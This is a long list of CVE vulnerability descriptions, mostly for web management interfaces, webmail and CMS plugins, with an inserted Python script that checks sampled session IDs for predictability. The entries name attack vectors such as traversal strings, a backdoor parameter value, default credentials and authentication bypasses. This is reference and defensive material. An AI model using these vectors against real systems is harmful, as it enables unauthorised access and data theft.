[CVE-2005-1284] The addnew script in Argosoft Mail Server Pro 1.8.7.6 allows remote attackers to create arbitrary accounts, even if "Allow Creation of Accounts From the Web Interface" is disabled, via a direct HTTP POST request.
[CVE-2005-1282] Multiple cross-site scripting (XSS) vulnerabilities in Argosoft Mail Server Pro 1.8.7.6 allow remote attackers to inject arbitrary web script or HTML via (1) the src parameter in an IMG tag, (2) User settings, or (3) Address book input boxes in the webmail interface.
[CVE-2005-0845] Directory traversal vulnerability in the Webmail interface in SurgeMail 2.2g3 allows remote authenticated users to write arbitrary files or directories via a .. (dot dot) in the attach_id parameter.
[CVE-2005-0812] The web interface in NotifyLink 3.0 displays passwords in cleartext on the administrative page, which could allow remote attackers or local users to obtain sensitive information.
[CVE-2005-0811] The web interface in NotifyLink 3.0 does not properly restrict access to functions that have been disabled in the GUI, which allows remote authenticated users to bypass intended restrictions via a direct request to certain URLs.
[CVE-2005-0567] Multiple PHP remote file inclusion vulnerabilities in phpMyAdmin 2.6.1 allow remote attackers to execute arbitrary PHP code by modifying the (1) theme parameter to phpmyadmin.css.php or (2) cfg[Server][extension] parameter to database_interface.lib.php to reference a URL on a remote web server that contains the code.
[CVE-2005-0281] Cross-site scripting (XSS) vulnerability in the web interface in Soldner Secret Wars 30830 allows remote attackers to inject arbitrary web script or HTML via a user message, which is not filtered or quoted when the administrator views the server logs.
[CVE-2005-0112] The web-based administrative interface for 3Com OfficeConnect Wireless 11g Access Point (AP) 1.00.08, and possibly earlier versions before 1.03.07A, allows remote attackers to bypass authentication and obtain sensitive information by directly accessing the (1) config.bin, (2) profile.wlp?PN=ggg, or (3) event.logs URLs.
[CVE-2005-0012] Format string vulnerability in the a_Interface_msg function in Dillo before 0.8.3-r4 allows remote attackers to execute arbitrary code via format string specifiers in a web page.
[CVE-2004-2691] Unspecified vulnerability in 3Com SuperStack 3 4400 switches with firmware version before 3.31 allows remote attackers to cause a denial of service (device reset) via a crafted request to the web management interface. NOTE: the provenance of this information is unknown.
[CVE-2004-2666] Mantis before 20041016 provides a complete Issue History (Bug History) in the web interface regardless of view_history_threshold, which allows remote attackers to obtain sensitive information (private bug details) by visiting a bug's web page.
[CVE-2004-2606] The Web interface in Linksys WRT54G 2.02.7 and BEFSR41 version 3, with the firewall disabled, allows remote attackers to attempt to login to an administration web page, even when the configuration specifies that remote administration is disabled.
[CVE-2004-2071] Macallan Mail Solution 2.8.4.6 (Build 260), and possibly earlier versions, allows remote attackers to bypass authentication in the web interface via an HTTP GET request with two slashes ("//") after the server name.
[CVE-2004-1981] The web interface for Crystal Reports allows remote attackers to cause a denial of service (disk exhaustion) by repeatedly requesting reports without retrieving the associated image files, which are not cleared from the image file folder.
[CVE-2004-1791] The web management interface in Edimax AR-6004 ADSL Routers uses a default administrator name and password, which also appear as the default login text for the management interface, which allows remote attackers to gain access.
[CVE-2004-1790] Cross-site scripting (XSS) vulnerability in the web management interface in Edimax AR-6004 ADSL Routers allows remote attackers to inject arbitrary web script or HTML via the URL.
[CVE-2004-1789] Cross-site scripting (XSS) vulnerability in the web management interface in ZyWALL 10 4.07 allows remote attackers to inject arbitrary web script or HTML via the rpAuth_1 page.
[CVE-2004-1699] SettingsBase.php in Pinnacle ShowCenter 1.51 allows remote attackers to cause a denial of service (web interface errors) via an invalid Skin parameter.
[CVE-2004-1591] The web interface for Micronet Wireless Broadband Router SP916BM running firmware before 1.9 08/04/2004 resets the password to the default password when the router is shut off, which could allow remote attackers to gain access.
[CVE-2004-1458] The CSAdmin web administration interface for Cisco Secure Access Control Server (ACS) 3.2(2) build 15 allows remote attackers to cause a denial of service (hang) via a flood of TCP connections to port 2002.
[CVE-2004-0945] The web management interface for Mitel 3300 Integrated Communications Platform (ICP) before 4.2.2.11 allows remote authenticated users to cause a denial of service (resource exhaustion) via a large number of active sessions, which exceeds ICP's maximum.
[CVE-2004-0944] The web management interface for Mitel 3300 Integrated Communications Platform (ICP) before 4.2.2.11 generates easily predictable web session IDs, which allows remote attackers to hijack other sessions via the parentsessionid cookie.
[CVE-2004-0764] Mozilla before 1.7, Firefox before 0.9, and Thunderbird before 0.7, allow remote web sites to hijack the user interface via the "chrome" flag and XML User Interface Language (XUL) files.
[CVE-2004-0672] Multiple cross-site scripting (XSS) vulnerabilities in the primary and management web interfaces in Netegrity IdentityMinder Web Edition 5.6 allow remote attackers to execute script as other users via (1) script that starts with %00 in the numOfExpressions parameter or (2) the mobjtype parameter.
[CVE-2004-0610] The Web administration interface in Microsoft MN-500 Wireless Router allows remote attackers to cause a denial of service (connection refusal) via a large number of open HTTP connections.
[CVE-2004-0067] Multiple cross-site scripting (XSS) vulnerabilities in phpGedView before 2.65 allow remote attackers to inject arbitrary HTML or web script via (1) descendancy.php, (2) index.php, (3) individual.php, (4) login.php, (5) relationship.php, (6) source.php, (7) imageview.php, (8) calendar.php, (9) gedrecord.php, (10) login.php, and (11) gdbi_interface.php. NOTE: some aspects of vector 10 were later reported to affect 4.1.
[CVE-2004-0014] Multiple buffer overflows in the nd WebDAV interface 0.8.2 and earlier allow remote web servers to execute arbitrary code via certain long strings.
[CVE-2003-1427] Directory traversal vulnerability in the web configuration interface in Netgear FM114P 1.4 allows remote attackers to read arbitrary files, such as the netgear.cfg configuration file, via a hex-encoded (%2e%2e%2f) ../ (dot dot slash) in the port parameter.
[CVE-2003-1363] The remote web management interface of Aprelium Technologies Abyss Web Server 1.1.2 and earlier does not log connection attempts to the web management port (9999), which allows remote attackers to mount brute force attacks on the administration console without detection.
[CVE-2003-1343] Trend Micro ScanMail for Exchange (SMEX) before 3.81 and before 6.1 might install a back door account in smg_Smxcfg30.exe, which allows remote attackers to gain access to the web management interface via the vcc parameter, possibly "3560121183d3".
[CVE-2003-1290] BEA WebLogic Server and WebLogic Express 6.1, 7.0, and 8.1, with RMI and anonymous admin lookup enabled, allow remote attackers to obtain configuration information by accessing MBeanHome via the Java Naming and Directory Interface (JNDI).
[CVE-2003-1286] HTTP Proxy in Sambar Server before 6.0 beta 6, when security.ini lacks a 127.0.0.1 proxydeny entry, allows remote attackers to send proxy HTTP requests to the Sambar Server's administrative interface and external web servers, by making a "Connection: keep-alive" request before the proxy requests.
[CVE-2003-0943] web-tools in SAP DB before 7.4.03.30 installs several services that are enabled by default, which could allow remote attackers to obtain potentially sensitive information or redirect attacks against internal databases via (1) waecho, (2) Web SQL Interface (websql), or (3) Web Database Manager (webdbm).
[CVE-2003-0377] SQL injection vulnerability in the web-based administration interface for iisPROTECT 2.2-r4, and possibly earlier versions, allows remote attackers to insert arbitrary SQL and execute code via certain variables, as demonstrated using the GroupName variable in SiteAdmin.ASP.
[CVE-2003-0273] Cross-site scripting (XSS) vulnerability in the web interface for Request Tracker (RT) 1.0 through 1.0.7 allows remote attackers to execute script via message bodies.
[CVE-2003-0126] The web interface for SOHO Routefinder 550 firmware 4.63 and earlier, and possibly later versions, has a default "admin" account with a blank password, which could allow attackers on the LAN side to conduct unauthorized activities.
[CVE-2003-0125] Buffer overflow in the web interface for SOHO Routefinder 550 before firmware 4.63 allows remote attackers to cause a denial of service (reboot) and execute arbitrary code via a long GET /OPTIONS value.
[CVE-2002-2345] Oracle 9i Application Server 9.0.2 stores the web cache administrator interface password in plaintext, which allows remote attackers to gain access.
[CVE-2002-2020] Netgear RP114 Cable/DSL Web Safe Router Firmware 3.26 uses a default administrator password and accepts admin logins on the external interface, which allows remote attackers to gain privileges if the password is not changed.
[CVE-2002-1673] The web interface for Webmin 0.92 does not properly quote or filter script code in files that are displayed to the interface, which allows local users to execute script and possibly steal cookies by inserting the script into certain files or fields, such as a real user name entry in the passwd file.
[CVE-2002-1532] The administrative web interface (STEMWADM) for SurfControl SuperScout Email Filter allows remote attackers to cause a denial of service (resource exhaustion) via a GET request without the terminating /r/n/r/n (CRLF) sequence, which causes the interface to wait for the sequence and blocks other users from accessing it.
[CVE-2002-1531] The administrative web interface (STEMWADM) for SurfControl SuperScout Email Filter allows remote attackers to cause a denial of service (crash) via an HTTP request without a Content-Length parameter.
[CVE-2002-1530] The administrative web interface (STEMWADM) for SurfControl SuperScout Email Filter allows users to obtain usernames and plaintext passwords via a request to the userlist.asp program, which includes the passwords in a user editing form.
[CVE-2002-1529] Cross-site scripting (XSS) vulnerability in msgError.asp for the administrative web interface (STEMWADM) for SurfControl SuperScout Email Filter allows remote attackers to insert arbitrary script or HTML via the Reason parameter.
[CVE-2002-1431] Belkin F5D5230-4 4-Port Cable/DSL Gateway Router 1.20.000 modifies the source IP address of internal packets to that of the router's external interface when forwarding a request from an internal host to an internal web server, which allows remote attackers to hide which host is being used to access the web server.
[CVE-2002-1312] Buffer overflow in the Web management interface in Linksys BEFW11S4 wireless access point router 2 and BEFSR11, BEFSR41, and BEFSRU31 EtherFast Cable/DSL routers with firmware before 1.43.3 with remote management enabled allows remote attackers to cause a denial of service (router crash) via a long password.
[CVE-2002-1195] Cross-site scripting vulnerability (XSS) in the PHP interface for ht://Check 1.1 allows remote web servers to insert arbitrary HTML, including script, via a web page.
[CVE-2002-1067] Administrative web interface for IC9 Pocket Print Server Firmware 7.1.30 and 7.1.36f allows remote attackers to cause a denial of service (reboot and reset) via a long password, possibly due to a buffer overflow.
[CVE-2002-0891] The web interface (WebUI) of NetScreen ScreenOS before 2.6.1r8, and certain 2.8.x and 3.0.x versions before 3.0.3r1, allows remote attackers to cause a denial of service (crash) via a long user name.
[CVE-2002-0870] The original patch for the Cisco Content Service Switch 11000 Series authentication bypass vulnerability (CVE-2001-0622) was incomplete, which still allows remote attackers to gain additional privileges by directly requesting the web management URL instead of navigating through the interface, possibly via a variant of the original attack, as identified by Cisco bug ID CSCdw08549.
[CVE-2002-0792] The web management interface for Cisco Content Service Switch (CSS) 11000 switches allows remote attackers to cause a denial of service (soft reset) via (1) an HTTPS POST request, or (2) malformed XML data.
[CVE-2002-0769] The web-based configuration interface for the Cisco ATA 186 Analog Telephone Adaptor allows remote attackers to bypass authentication via an HTTP POST request with a single byte, which allows the attackers to (1) obtain the password from the login screen, or (2) reconfigure the adaptor by modifying certain request parameters.
[CVE-2002-0670] The web interface for Pingtel xpressa SIP-based voice-over-IP phone 1.2.5 through 1.2.7.4 uses Base64 encoded usernames and passwords for HTTP basic authentication, which allows remote attackers to steal and easily decode the passwords via sniffing.
[CVE-2002-0669] The web interface for Pingtel xpressa SIP-based voice-over-IP phone 1.2.5 through 1.2.7.4 allows administrators to cause a denial of service by modifying the SIP_AUTHENTICATE_SCHEME value to force authentication of incoming calls, which does not notify the user when an authentication failure occurs.
[CVE-2002-0668] The web interface for Pingtel xpressa SIP-based voice-over-IP phone 1.2.5 through 1.2.7.4 allows authenticated users to modify the Call Forwarding settings and hijack calls.
[CVE-2002-0561] The default configuration of the PL/SQL Gateway web administration interface in Oracle 9i Application Server 1.0.2.x uses null authentication, which allows remote attackers to gain privileges and modify DAD settings.
[CVE-2002-0393] Buffer overflow in Red-M 1050 (Bluetooth Access Point) management web interface allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long administration password.
[CVE-2002-0238] Cross-site scripting vulnerability in web administration interface for NetGear RT314 and RT311 Gateway Routers allows remote attackers to execute arbitrary script on another client via a URL that contains the script.
[CVE-2002-0107] Web administration interface in CacheFlow CacheOS 4.0.13 and earlier allows remote attackers to obtain sensitive information via a series of GET requests that do not end with HTTP/1.0 or another version string, which causes the information to be leaked in the error message.
[CVE-2001-1294] Buffer overflow in A-V Tronics Inetserv 3.2.1 and earlier allows remote attackers to cause a denial of service (crash) in the Webmail interface via a long username and password.
[CVE-2001-1283] The webmail interface for Ipswitch IMail 7.04 and earlier allows remote authenticated users to cause a denial of service (crash) via a mailbox name that contains a large number of . (dot) or other characters to programs such as (1) readmail.cgi or (2) printmail.cgi, possibly due to a buffer overflow that may allow execution of arbitrary code.
[CVE-2001-1252] Network Associates PGP Keyserver 7.0 allows remote attackers to bypass authentication and access the administrative web interface via URLs that directly access cgi-bin instead of keyserver/cgi-bin for the programs (1) console, (2) cs, (3) multi_config and (4) directory.
[CVE-2001-1039] The JetAdmin web interface for HP JetDirect does not set a password for the telnet interface when the admin password is changed, which allows remote attackers to gain access to the printer.
[CVE-2001-0785] Directory traversal in Webpaging interface in Internet Software Solutions Air Messenger LAN Server (AMLServer) 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) attack.
[CVE-2001-0622] The web management service on Cisco Content Service series 11000 switches (CSS) before WebNS 4.01B29s or WebNS 4.10B17s allows a remote attacker to gain additional privileges by directly requesting the web management URL instead of navigating through the interface.
[CVE-2001-0455] Cisco Aironet 340 Series wireless bridge before 8.55 does not properly disable access to the web interface, which allows remote attackers to modify its configuration.
[CVE-2001-0270] Marconi ASX-1000 ASX switches allow remote attackers to cause a denial of service in the telnet and web management interfaces via a malformed packet with the SYN-FIN and More Fragments attributes set.
[CVE-2001-0133] The web administration interface for Interscan VirusWall 3.6.x and earlier does not use encryption, which could allow remote attackers to obtain the administrator password by sniffing the setpasswd.cgi program or other HTTP GET requests that contain base64 encoded usernames and passwords.
[CVE-2001-0097] The Web interface for Infinite Interchange 3.6.1 allows remote attackers to cause a denial of service (application crash) via a large POST request.
[CVE-2001-0058] The Web interface to Cisco 600 routers running CBOS 2.4.1 and earlier allows remote attackers to cause a denial of service via a URL that does not end in a space character.
[CVE-2001-0056] The Cisco Web Management interface in routers running CBOS 2.4.1 and earlier does not log invalid logins, which allows remote attackers to guess passwords without detection.
[CVE-2001-0007] Buffer overflow in NetScreen Firewall WebUI allows remote attackers to cause a denial of service via a long URL request to the web administration interface.
[CVE-2000-1038] The web administration interface for IBM AS/400 Firewall allows remote attackers to cause a denial of service via an empty GET request.
[CVE-2000-0945] The web configuration interface for Catalyst 3500 XL switches allows remote attackers to execute arbitrary commands without authentication when the enable password is not set, via a URL containing the /exec/ directory.
[CVE-2000-0758] The web interface for Lyris List Manager 3 and 4 allows list subscribers to obtain administrative access by modifying the value of the list_admin hidden form field.
[CVE-2000-0697] The administration interface for the dwhttpd web server in Solaris AnswerBook2 allows interface users to remotely execute commands via shell metacharacters.
[CVE-2000-0696] The administration interface for the dwhttpd web server in Solaris AnswerBook2 does not properly authenticate requests to its supporting CGI scripts, which allows remote attackers to add user accounts to the interface by directly calling the admin CGI script.
[CVE-2000-0634] The web administration interface for CommuniGate Pro 3.2.5 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) attack.
[CVE-2000-0557] Buffer overflow in the web interface for Cmail 2.4.7 allows remote attackers to execute arbitrary commands via a long GET request.
[CVE-2000-0556] Buffer overflow in the web interface for Cmail 2.4.7 allows remote attackers to cause a denial of service by sending a large user name to the user dialog running on port 8002.
[CVE-2000-0443] The web interface server in HP Web JetAdmin 5.6 allows remote attackers to read arbitrary files via a .. (dot dot) attack.
[CVE-1999-1000] The web administration interface for Cisco Cache Engine allows remote attackers to view performance statistics.
[CVE-1999-0887] FTGate web interface server allows remote attackers to read files via a .. (dot dot) attack.
[CVE-1999-0884] The Zeus web server administrative interface uses weak encryption for its passwords.
[CVE-1999-0842] Symantec Mail-Gear 1.0 web interface server allows remote users to read arbitrary files via a .. (dot dot) attack.
[CVE-1999-0571] A router's configuration service or management interface (such as a web server or telnet) is configured to allow connections from arbitrary hosts.
[CVE-2013-5100] Cross-site scripting (XSS) vulnerability in the Static Methods since 2007 (div2007) extension before 0.10.2 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to the t3lib_div::quoteJSvalue function.
[CVE-2013-5099] Cross-site scripting (XSS) vulnerability in article.php in Anchor CMS 0.9.1, when comments are enabled, allows remote attackers to inject arbitrary web script or HTML via the Name field. NOTE: some sources have reported that comments.php is vulnerable, but certain functions from comments.php are used by article.php.
[CVE-2013-5098] Cross-site scripting (XSS) vulnerability in admin/admin.php in the Download Monitor plugin before 3.3.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the sort parameter, a different vulnerability than CVE-2013-3262.
[CVE-2013-5020] Multiple cross-site scripting (XSS) vulnerabilities in bb_admin.php in MiniBB before 3.0.1 allow remote attackers to inject arbitrary web script or HTML via the (1) forum_name, (2) forum_group, (3) forum_icon, or (4) forum_desc parameter. NOTE: the whatus vector is already covered by CVE-2008-2066.
[CVE-2013-5002] Cross-site scripting (XSS) vulnerability in libraries/schema/Export_Relation_Schema.class.php in phpMyAdmin 3.5.x before 3.5.8.2 and 4.0.x before 4.0.4.2 allows remote authenticated users to inject arbitrary web script or HTML via a crafted pageNumber value to schema_export.php.
[CVE-2013-5001] Cross-site scripting (XSS) vulnerability in libraries/plugins/transformations/abstract/TextLinkTransformationsPlugin.class.php in phpMyAdmin 4.0.x before 4.0.4.2 allows remote authenticated users to inject arbitrary web script or HTML via a crafted object name associated with a TextLinkTransformationPlugin link.
[CVE-2013-4997] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 3.5.x before 3.5.8.2 allow remote attackers to inject arbitrary web script or HTML via vectors involving a JavaScript event in (1) an anchor identifier to setup/index.php or (2) a chartTitle (aka chart title) value.
[CVE-2013-4996] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 3.5.x before 3.5.8.2 and 4.0.x before 4.0.4.2 allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) a crafted database name, (2) a crafted user name, (3) a crafted logo URL in the navigation panel, (4) a crafted entry in a certain proxy list, or (5) crafted content in a version.json file.
[CVE-2013-4995] Cross-site scripting (XSS) vulnerability in phpMyAdmin 3.5.x before 3.5.8.2 and 4.0.x before 4.0.4.2 allows remote authenticated users to inject arbitrary web script or HTML via a crafted SQL query that is not properly handled during the display of row information.
[CVE-2013-4954] Multiple cross-site scripting (XSS) vulnerabilities in wp-login.php in the Genetech Solutions Pie-Register plugin before 1.31 for WordPress, when "Allow New Registrations to set their own Password" is enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) pass1 or (2) pass2 parameter in a register action. NOTE: some of these details are obtained from third party information.
[CVE-2013-4951] Multiple cross-site scripting (XSS) vulnerabilities in Mintboard 0.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) pass parameter in views/login.php or (3) name or (4) pass parameter in views/signup.php.
[CVE-2013-4950] Cross-site scripting (XSS) vulnerability in view.php in Machform 2 allows remote attackers to inject arbitrary web script or HTML via the element_2 parameter.
[CVE-2013-4946] Multiple cross-site scripting (XSS) vulnerabilities in BMC Service Desk Express (SDE) 10.2.1.95 allow remote attackers to inject arbitrary web script or HTML via the (1) SelTab parameter to QV_admin.aspx, the (2) CallBack parameter to QV_grid.aspx, or the (3) HelpPage parameter to commonhelp.aspx.
[CVE-2013-4944] Cross-site scripting (XSS) vulnerability in the BuddyPress Extended Friendship Request plugin before 1.0.2 for WordPress, when the "Friend Connections" component is enabled, allows remote attackers to inject arbitrary web script or HTML via the friendship_request_message parameter to wp-admin/admin-ajax.php. NOTE: some of these details are obtained from third party information.
[CVE-2013-4942] Cross-site scripting (XSS) vulnerability in flashuploader.swf in the Uploader component in Yahoo! YUI 3.5.0 through 3.9.1, as used in Moodle through 2.1.10, 2.2.x before 2.2.11, 2.3.x before 2.3.8, 2.4.x before 2.4.5, 2.5.x before 2.5.1, and other products, allows remote attackers to inject arbitrary web script or HTML via a crafted string in a URL.
[CVE-2013-4941] Cross-site scripting (XSS) vulnerability in uploader.swf in the Uploader component in Yahoo! YUI 3.2.0 through 3.9.1, as used in Moodle through 2.1.10, 2.2.x before 2.2.11, 2.3.x before 2.3.8, 2.4.x before 2.4.5, 2.5.x before 2.5.1, and other products, allows remote attackers to inject arbitrary web script or HTML via a crafted string in a URL.
[CVE-2013-4940] Cross-site scripting (XSS) vulnerability in io.swf in the IO Utility component in Yahoo! YUI 3.10.2, as used in Moodle through 2.1.10, 2.2.x before 2.2.11, 2.3.x before 2.3.8, 2.4.x before 2.4.5, 2.5.x before 2.5.1, and other products, allows remote attackers to inject arbitrary web script or HTML via a crafted string in a URL. NOTE: this vulnerability exists because of a CVE-2013-4939 regression.
[CVE-2013-4939] Cross-site scripting (XSS) vulnerability in io.swf in the IO Utility component in Yahoo! YUI 3.0.0 through 3.9.1, as used in Moodle through 2.1.10, 2.2.x before 2.2.11, 2.3.x before 2.3.8, 2.4.x before 2.4.5, 2.5.x before 2.5.1, and other products, allows remote attackers to inject arbitrary web script or HTML via a crafted string in a URL.
[CVE-2013-4912] Open redirect vulnerability in Siemens WinCC (TIA Portal) 11 and 12 before 12 SP1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks by leveraging improper configuration of SIMATIC HMI panels by the WinCC product.
[CVE-2013-4890] The DMCRUIS/0.1 web server on the Samsung PS50C7700 TV allows remote attackers to cause a denial of service (daemon crash) via a long URI to TCP port 5600.
[CVE-2013-4883] Multiple cross-site scripting (XSS) vulnerabilities in McAfee ePolicy Orchestrator 4.6.6 and earlier, and the ePO Extension for the McAfee Agent (MA) 4.5 through 4.6, allow remote attackers to inject arbitrary web script or HTML via the (1) instanceId parameter core/loadDisplayType.do
[CVE-2013-4872] Google Glass before XE6 does not properly restrict the processing of QR codes, which allows physically proximate attackers to modify the configuration or redirect users to arbitrary web sites via a crafted symbol, as demonstrated by selecting a Wi-Fi access point in order to conduct a man-in-the-middle attack.
[CVE-2013-4802] Cross-site scripting (XSS) vulnerability in HP Application Lifecycle Management (ALM) Quality Center before 11.51 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka ZDI-CAN-1565.
[CVE-2013-4779] Cross-site scripting (XSS) vulnerability in core/handleTw.php on the Siemens Enterprise OpenScape Branch appliance and OpenScape Session Border Controller (SBC) before 2 R0.32.0, and 7 before 7 R1.7.0, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-4759] Multiple cross-site scripting (XSS) vulnerabilities in the Magnolia Form module 1.x before 1.4.7 and 2.x before 2.0.2 for Magnolia CMS allow remote attackers to inject arbitrary web script or HTML via the (1) username, (2) fullname, or (3) email parameter to magnoliaPublic/demo-project/members-area/registration.html.
[CVE-2013-4749] Cross-site scripting (XSS) vulnerability in the UserTask Center, Messaging (sys_messages) extension 1.1.0 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-4747] Cross-site scripting (XSS) vulnerability in the Accessible browse results for indexed search (accessible_is_browse_results) extension 1.2.1 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-4746] Cross-site scripting (XSS) vulnerability in the My quiz and poll (myquizpoll) extension before 2.0.6 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-4744] Cross-site scripting (XSS) vulnerability in the PHPUnit extension before 3.5.15 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-4733] The web server on the Digital Alert Systems DASDEC EAS device before 2.0-2 and the Monroe Electronics R189 One-Net EAS device before 2.0-2 allows remote attackers to obtain sensitive configuration and status information by reading log files.
[CVE-2013-4732] ** DISPUTED ** The administrative web server on the Digital Alert Systems DASDEC EAS device through 2.0-2 and the Monroe Electronics R189 One-Net EAS device through 2.0-2 uses predictable session ID values, which makes it easier for remote attackers to hijack sessions by sniffing the network. NOTE: VU#662676 states "Monroe Electronics could not reproduce this finding."
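The disputed entry above turns on whether the session IDs are actually predictable, which is something a tester can settle from a handful of captured values rather than argue about. The following is an added example, not code from the vulscan page, VulDB or either vendor: given hex session identifiers in the order they were issued, it reports three signals a practitioner looks for (a constant step between consecutive IDs, a value span far narrower than the identifier width, and low per-character entropy). The two ID sets it runs on are constructed; the "random-like" set is derived from SHA-256 of a counter purely so the example is deterministic offline, it is not a recommended generator.

```python
"""Predictability signals for sampled web session identifiers.

Added example for the DASDEC/R189 predictable-session-ID entry; it is not
from the vulscan page, VulDB or the vendors.  Assumes the IDs are
fixed-width hex strings captured in issue order.
"""
import hashlib
import math
from collections import Counter


def hex_char_entropy(ids):
    """Shannon entropy in bits per character over the concatenated IDs.

    A uniformly random hex string approaches 4.0; counter- or
    time-derived IDs usually sit well below 3.0 because most positions
    never change.
    """
    joined = "".join(ids).lower()
    counts = Counter(joined)
    n = len(joined)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def assess_session_ids(ids, min_entropy_bits=3.0):
    """Return the individual signals plus an overall 'predictable' verdict."""
    width_bits = 4 * len(ids[0])
    values = [int(s, 16) for s in ids]
    deltas = [b - a for a, b in zip(values, values[1:])]
    # constant step: a pure counter (or fixed-increment timestamp)
    constant_step = len(set(deltas)) == 1
    # narrow span: all samples fall inside a tiny slice of the ID space
    span_bits = (max(values) - min(values)).bit_length()
    narrow_span = span_bits < width_bits // 2
    entropy = hex_char_entropy(ids)
    low_entropy = entropy < min_entropy_bits
    return {
        "width_bits": width_bits,
        "span_bits": span_bits,
        "constant_step": constant_step,
        "entropy_bits_per_char": round(entropy, 2),
        "predictable": constant_step or narrow_span or low_entropy,
    }


def demo_ids():
    """Constructed samples: a sequential-counter scheme and a hash-derived one."""
    sequential = ["%08x" % (0x3E8 + i) for i in range(20)]
    # deterministic stand-in for a CSPRNG-backed generator (constructed data)
    random_like = [hashlib.sha256(b"demo-%d" % i).hexdigest()[:8]
                   for i in range(20)]
    return sequential, random_like


if __name__ == "__main__":
    seq, rnd = demo_ids()
    print("sequential :", assess_session_ids(seq))
    print("random-like:", assess_session_ids(rnd))
```

Twenty samples are enough to expose a counter or a timestamp; they are not enough to certify a generator as sound, so a clean result here only means the cheap checks passed. If a vendor cannot reproduce a report like the one above, sending them the raw sample and this output is usually what moves the discussion forward.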
[CVE-2013-4680] Open redirect vulnerability in Maag Form Captcha extension 2.0.0 and earlier for TYPO3 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
[CVE-2013-4676] Multiple cross-site scripting (XSS) vulnerabilities in Symantec Backup Exec 2010 R3 before 2010 R3 SP3 and 2012 before SP2 allow remote attackers to inject arbitrary web script or HTML via vectors involving a (1) custom-reports generation page, (2) Storage Devices creation page, or (3) jobs creation page in the management console
[CVE-2013-4674] Cross-site scripting (XSS) vulnerability in the Web Email Protection component in Symantec Encryption Management Server (formerly Symantec PGP Universal Server) before 3.3.0 MP2 allows remote authenticated users to inject arbitrary web script or HTML via a crafted encrypted e-mail attachment.
[CVE-2013-4673] The management console on the Symantec Web Gateway (SWG) appliance before 5.1.1 does not properly implement RADIUS authentication, which allows remote attackers to execute arbitrary code by leveraging access to the login prompt.
[CVE-2013-4672] The management console on the Symantec Web Gateway (SWG) appliance before 5.1.1 has an incorrect sudoers file, which allows local users to bypass intended access restrictions via a command.
[CVE-2013-4671] Cross-site request forgery (CSRF) vulnerability in the management console on the Symantec Web Gateway (SWG) appliance before 5.1.1 allows remote authenticated users to hijack the authentication of unspecified victims via unknown vectors.
[CVE-2013-4670] Multiple cross-site scripting (XSS) vulnerabilities in the management console on the Symantec Web Gateway (SWG) appliance before 5.1.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-4652] Unspecified vulnerability in the command-line management interface on Siemens Scalance W7xx devices with firmware before 4.5.4 allows remote attackers to bypass authentication and execute arbitrary code via a (1) SSH or (2) TELNET connection.
[CVE-2013-4625] Cross-site scripting (XSS) vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter.
[CVE-2013-4619] Multiple SQL injection vulnerabilities in OpenEMR 4.1.1 allow remote authenticated users to execute arbitrary SQL commands via the (1) start or (2) end parameter to interface/reports/custom_report_range.php, or the (3) form_newid parameter to custom/chart_tracker.php.
[CVE-2013-4613] The default configuration of the administrative interface on the Canon MG3100, MG5300, MG6100, MP495, MX340, MX870, MX890, MX920, and MX922 printers does not require authentication, which allows remote attackers to modify the configuration by visiting the Advanced page. NOTE: the vendor has apparently responded by stating "for user convenience, the default setting does not require a password. However, if a user has a particular concern about third parties accessing the user's home printer, the default setting can be changed to add a password."
[CVE-2013-4612] Multiple cross-site scripting (XSS) vulnerabilities in REDCap before 5.1.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving different modules.
[CVE-2013-4608] Cross-site scripting (XSS) vulnerability in REDCap before 5.0.6 allows remote attackers to inject arbitrary web script or HTML via vectors involving the Graphical Data View & Descriptive Stats page.
[CVE-2013-4600] Multiple cross-site scripting (XSS) vulnerabilities in Alkacon OpenCms before 8.5.2 allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to system/workplace/views/admin/admin-main.jsp or the (2) requestedResource parameter to system/login/index.html.
[CVE-2013-4140] Cross-site scripting (XSS) vulnerability in the TinyBox (Simple Splash) module before 7.x-2.2 for Drupal allows remote authenticated users with the "administer tinybox" permission to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-4117] Cross-site scripting (XSS) vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter.
[CVE-2013-4092] The SecureSphere Operations Manager (SOM) Management Server in Imperva SecureSphere 9.0.0.5 allows context-dependent attackers to obtain sensitive information by leveraging the presence of (1) a session ID in the jsessionid field to secsphLogin.jsp or (2) credentials in the j_password parameter to j_acegi_security_check, and reading (a) web-server access logs, (b) web-server Referer logs, or (c) the browser history.
[CVE-2013-4038] The Intelligent Platform Management Interface (IPMI) implementation in Integrated Management Module (IMM) on IBM BladeCenter, Flex System, System x iDataPlex, and System x3### servers uses cleartext for password storage, which allows context-dependent attackers to obtain sensitive information by reading a file.
[CVE-2013-4037] The RAKP protocol support in the Intelligent Platform Management Interface (IPMI) implementation in Integrated Management Module (IMM) and Integrated Management Module II (IMM2) on IBM BladeCenter, Flex System, System x iDataPlex, and System x3### servers sends a password hash to the client, which makes it easier for remote attackers to obtain access via a brute-force attack.
